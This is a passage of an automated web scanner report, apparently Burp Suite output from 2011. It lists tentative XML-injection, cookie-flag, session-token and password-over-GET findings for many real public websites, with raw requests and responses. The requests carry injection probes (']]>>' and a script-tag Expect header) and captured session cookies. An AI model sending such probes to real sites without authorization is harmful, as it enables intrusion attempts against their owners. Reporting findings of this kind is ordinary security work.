The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:20 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The F cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the F cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT]]>>; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:03 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...
</a>Higher costs hit soap makers and will hit shoppers.</div>
...[SNIP]...

11.6. http://translate.googleapis.com/translate_a/l [cb parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The cb parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the cb parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gn72esm1]]>> HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:11 GMT
Expires: Mon, 02 May 2011 02:30:11 GMT
Cache-Control: private, max-age=86400
Content-Type: text/xml; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=644bd9b9a05b0c42:TM=1304303411:LM=1304303411:S=VM-yzGjHZNmmB5-J; expires=Wed, 01-May-2013 02:30:11 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 11962

<?xml version="1.0" encoding="UTF-8" ?><LanguagePairs><Pair source_id="auto" source_name="Detect language" target_id="en" target_name="English" text="" /><Pair source_id="af" source_name="Afrikaans" t
...[SNIP]...

11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.binsearch.info
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.binsearch.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:57:32 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hairyforever.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyforever.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.11
Date: Mon, 02 May 2011 00:15:41 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=45
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Mon, 02 May 2011 00:15:41 GMT
Content-Length: 1011

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide]]>>/graphics/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:14 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide/graphics]]>>/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:23 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide/graphics/zoomout.cur]]>> HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.mangastream.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mangastream.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 00:34:17 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.masalaboard.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.masalaboard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:17:57 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myp2p.eu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myp2p.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:24:02 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.oxfamamerica.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oxfamamerica.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:54:46 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Bobo-Exception-Line: 672
Bobo-Exception-Value: See the server error log for details
Content-Language: en-us
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Expires: Sat, 1 Jan 2000 00:00:00 GMT
X-Ksscommands: <?xml version="1.0"?> <kukit xmlns="http://www.kukit.org/commands/1.1"> <commands>    <command name="error">        <param name="type">system</param>        <param name="message">NotFound: &amp;lt;h2&amp;gt;Site Error&amp;lt;/h2&amp;gt; &amp;lt;p&amp;gt;An error was encountered while publishing this resource. &amp;lt;/p&amp;gt; &amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Resource not found&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt; Sorry, the requested resource does not exist.&amp;lt;p&amp;gt;Check the URL and try again.&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;&amp;lt;b&amp;gt;Resource:&amp;lt;/b&amp;gt; http://www.oxfamamerica.org/favicon.ico%5D%5D%3E%3E&amp;lt;/p&amp;gt; &amp;lt;hr noshade="noshade"/&amp;gt; &amp;lt;p&amp;gt;Troubleshooting Suggestions&amp;lt;/p&amp;gt; &amp;lt;ul&amp;gt; &amp;lt;li&amp;gt;The URL may be incorrect.&amp;lt;/li&amp;gt; &amp;lt;li&amp;gt;The parameters passed to this resource may be incorrect.&amp;lt;/li&amp;gt; &amp;lt;li&amp;gt;A resource that this resource relies on may be encountering an error.&amp;lt;/li&amp;gt; &amp;lt;/ul&amp;gt; &amp;lt;p&amp;gt;For more detailed information about the error, please refer to the error log. &amp;lt;/p&amp;gt; &amp;lt;p&amp;gt;If the error persists please contact the site maintainer. Thank you for your patience. &amp;lt;/p&amp;gt;</param>    </command> </commands> </kukit>
Content-Length: 25488
X-Varnish: 2109310493
Age: 0
Via: 1.1 varnish

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
lang="en-
...[SNIP]...

11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.yardmalls.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yardmalls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 415
Date: Mon, 02 May 2011 00:19:42 GMT
X-Varnish: 723476696
Age: 0
Via: 1.1 varnish
nnCoection: close
X-Served-By: tdd02.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

12. SSL cookie without secure flag set
There are 3 instances of this issue:


12.1. https://www.crankyape.com/member/registration.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...

12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...

12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...

13. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.59
X-Cnection: close
Date: Sun, 01 May 2011 23:32:35 GMT
Content-Length: 0


14. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

